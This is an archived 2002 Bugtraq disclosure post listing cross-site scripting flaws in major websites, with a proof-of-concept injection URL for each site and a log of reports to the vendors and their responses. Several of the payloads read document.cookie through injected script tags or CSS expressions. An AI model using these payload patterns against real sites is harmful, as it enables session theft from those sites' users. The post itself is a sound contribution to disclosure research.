Bugtraq mailing list archives

Cross site scripting in almost every major website


From: Berend-Jan Wever <skylined () edup tudelft nl>
Date: 19 Apr 2002 17:28:06 -0000



On April 26 I posted a message about Cross-Site scripting (see bottom). I mentioned that I had found Cross-site scripting flaws in many major websites but I did not publish the exact details of these flaws. After notifying the owners of these sites and giving them time to respond and fix the problem, I now feel I have to post the details to bugtraq. This information and more on cross-site scripting can also be found on my website http://spoor12.edup.tudelft.nl/skylined which is updated almost daily.

Kind regards,
Berend-Jan Wever.

Cross-site scripting archive: Here are all the sites that I know to have at least one cross-site scripting flaw. I have logged all the communication I have had with them. (Last update April 19, 2002)

www.search.com
http://www.search.com/search?q='><SCRIPT>alert(document.cookie)</SCRIPT>'
- 23 mar 2002 Reported @ "http://www.cnet.com/cnetsupport/contact/1,10161,0-3945,00.html"
- 28 mar 2002 Reported @ "http://www.search.com/feedback/"

--------------------------------------------------------------------------------

www.altavista.com
http://www.altavista.com/sites/search/web?q=*&kl="><SCRIPT>alert(document.cookie)</SCRIPT>
- 23 mar 2002 Reported @ "http://help.altavista.com/contact/search"
- 25 mar 2002 Reply by email: "We have forwarded your email to our engineering team for further investigation"

--------------------------------------------------------------------------------

edit.yahoo.com
http://edit.yahoo.com/config?.done="%20style="width:expression(document.write(document.cookie));
- 27 mar 2002 Reported to "arturo@yahoo-inc.com", "mfk () yahoo-inc com"

--------------------------------------------------------------------------------

search.netscape.com
addressbook.netscape.com
http://search.netscape.com/search.psp?search="><SCRIPT>alert(document.cookie)</SCRIPT>
http://addressbook.netscape.com/search.adp?SearchStr="><SCRIPT>alert(document.cookie)</SCRIPT>
(Addressbook.netscape.com requires you to be logged in)
- 23 mar 2002 Reported @ "http://help.netscape.com/website/feedback.html"

--------------------------------------------------------------------------------

cq-search.ebay.com
http://cq-search.ebay.com/search/search.dll?MfcISAPICommand=GetResult&ht="><SCRIPT>alert(document.cookie)</SCRIPT>&query=a
- 26 mar 2002 Reported to "clalonde () ebay com"
- 27 mar 2002 Reply by email: "Reviewing the issue", "Do you have any suggestions?"
- 27 mar 2002 Gave some hints and told them about my CSS howto.

--------------------------------------------------------------------------------

www.amazon.com
http://www.amazon.com/exec/obidos/ASIN/B00005T68P/ref%3D%20style%3Dwidth%3Aexpression%28document.write%28document.cookie%29%29%20/
- 23 mar 2002 Reported @ "http://www.amazon.com/exec/obidos/handle-generic-form/102-3185800-6674542?action=next-page&target=stores/help/self-service-email-form-dispatch.html&display=basic&browse=560710&method=GET&cgi-post-result=1/102-3185800-6674542."
- 26 mar 2002 "Cyrus () amazon com" responded to my bugtraq post
- 26 mar 2002 Reported to "Cyrus () amazon com"
- 26 mar 2002 Told them about my CSS howto.

--------------------------------------------------------------------------------

www.looksmart.com
cnn.looksmart.com
http://www.looksmart.com/r_search?look=&key=><SCRIPT>alert(document.cookie)</SCRIPT>
http://cnn.looksmart.com/r_search?look=&key=><SCRIPT>alert(document.cookie)</SCRIPT>
- 23 mar 2002 Reported to "feedback () looksmart net"

--------------------------------------------------------------------------------

www.time.com
http://www.time.com/time/searchresults?query=a&summaries="%20style="width:expression(document.write(document.cookie))"
- 23 mar 2002 Reported to "daily () timeinc net"
- 26 mar 2002 Reported to "Renee_Guttmann () timeinc com"

--------------------------------------------------------------------------------

www.infospace.com
http://www.infospace.com/info.xcite/dog/newsresults.htm?&qkw="><SCRIPT>alert(document.cookie)</SCRIPT>&qcat=news&fs=nws
- 23 mar 2002 Reported @ "http://www.infospace.com/info/redirs_all.htm?pgtarg=abtct&"

--------------------------------------------------------------------------------

www.lasseters.com.au
http://www.lasseters.com.au/default3.asp?Network="%20onload="alert(document.cookie);"%20z="
- 28 mar 2002 Reported @ "http://www.lasseters.com.au/help/onetoone.html" to Karl F (chatid 114640)
- 28 mar 2002 Reported to "support () lasseters com au"
- 28 mar 2002 (Automated) reply by email: "our priority is to respond to your query as soon as possible", tracking number T20020328004M
- 28 mar 2002 Reply by email: "We are investigating this issue very seriously", "I have passed this information onto the relevant department"

--------------------------------------------------------------------------------

my.abcnews.go.com
http://my.abcnews.go.com/localpageMainHandler?input=<SCRIPT>alert(document.cookie)</SCRIPT>
- 28 mar 2002 Reported @ "http://abcnews.go.com/service/Help/abccontactform.html"

Fixed cross-site scripting flaws archive
Here are all the cross-site scripting flaws I uncovered which have been fixed now. This is just to show how it was done and who have been found wanting.

www.redhat.com
http://www.redhat.com/apps/search/results.html?ie="><SCRIPT>alert(document.cookie)</SCRIPT>
- 26 mar 2002 "mjc () redhat com" responded to my bugtraq post.
- 26 mar 2002 Reported to "mjc () redhat com"
- 26 mar 2002 Reply from "tlancast () redhat com": "Fixed now"

--------------------------------------------------------------------------------

www.hotmail.com
See my MSN Hotmail Cross-site scripting page for more information
- 19 mar 2002 Reported @ "Report a bug on the Hotmail website" (url contained sensitive information ;)~
- 22 mar 2002 Reported to "support () hotmail com" - bounced
- 23 mar 2002 Reply from "abuse () css one microsoft com": "Look at the help if you have any problems using hotmail"
- 27 mar 2002 Explained it was a serious issue to "abuse () css one microsoft com"
- 27 mar 2002 Reply from "abuse () css one microsoft com": "Your e-mail has been forwarded to the appropriate team"
- 28 mar 2002 Reply from "support_x () css one microsoft com": "We have tried to reproduce the error, but have been unable to do so"
- 29 mar 2002 Sent a working example to "cs_serv () hotmail com"
- 30 mar 2002 Reply from "cs_serv () hotmail com": "We have confirmed the issue that you describe and are currently working on a fix"
- 30 mar 2002 Reply from "cs_serv () hotmail com": "we have isolated the bug and expect to have a fix for it out by Wednesday." (3 apr 2002)
The fix: as far as I could find out they now replace the properties 'dataFld', 'dataFormatAs' and 'dataSrc' of any HTML tag with 'xdataFld', 'xdataFormatAs' and 'xdataSrc' to prevent XML generation of HTML altogether.
MSN Hotmail has been very polite to thank me for bringing this to their attention multiple times.

--------------------------------------------------------------------------------

search.microsoft.com
http://search.microsoft.com/default.asp?qu=";%0D%0Aalert(document.cookie);%0D%0Aa="&boolean=ALL
This one was fixed within hours after discovery and without me notifying Microsoft; now that's service!

--------------------------------------------------------------------------------

www.google.com
http://www.google.nl/search?as_q=a&ie="><SCRIPT>alert(document.cookie)</SCRIPT>
- 23 mar 2002 Reported to "webmaster () google com"
- 23 mar 2002 (Automated) reply by email: "you'll hear from us soon"
The fix: all '<' and '>' characters are replaced with '_'.
I have not received a word from Google except for the automated responses. (Guess whether I'm gonna report the next CSS to them...)

--------------------------------------------------------------------------------

www.nic.cc
http://www.nic.cc/cgi-bin/cart?domain=<SCRIPT>alert(document.cookie)</SCRIPT>
- 23 mar 2002 Reported to "clientcare () enic cc"
The fix: filter out '<' and '>'.
I have not received a word from Nic.cc. (Guess whether I'm gonna report the next CSS to them...)

--------------------------------------------------------------------------------

support.microsoft.com
http://support.microsoft.com/default.aspx?scid=');}alert(document.cookie);{//
- 28 mar 2002 Reported to "support () microsoft com"
- 28 mar 2002 (Automated) reply by email: "Your e-mail <snip> will be handled personally by one of our Customer Service Representatives within 24 hours"
The fix: the ' in the exploit url used to end a string, but this string is now enclosed by " instead of ', and the " character is filtered out.
I have not received a word from Microsoft support except for the automated responses. (Guess whether I'm gonna report the next CSS to them...)

--------------------------------------------------------------------------------

download.cnet.com
http://download.cnet.com/downloads/1,10150,0-10001-103-0-1-7,00.html?qt=<SCRIPT>alert(document.cookie)</SCRIPT>
- 28 mar 2002 Reported @ "http://download.cnet.com/downloads/0-10000-7-1532857.html?tag=subnav"
The fix: The characters <, > and " are replaced with &lt;, &gt; and &quot;.

--------------------------------------------------------------------------------

www.nu
http://www.nu/tour/tour_images.cfm?ID=EN&site=<SCRIPT>alert(document.cookie)</SCRIPT>
(The error report would suggest a SQL-injection vulnerability but I have not done further testing.)
- 23 mar 2002 Reported both CSS & SQL-injection to "dwd () mail nic nu"
- 19 apr 2002 The bug seems to have been fixed.
 


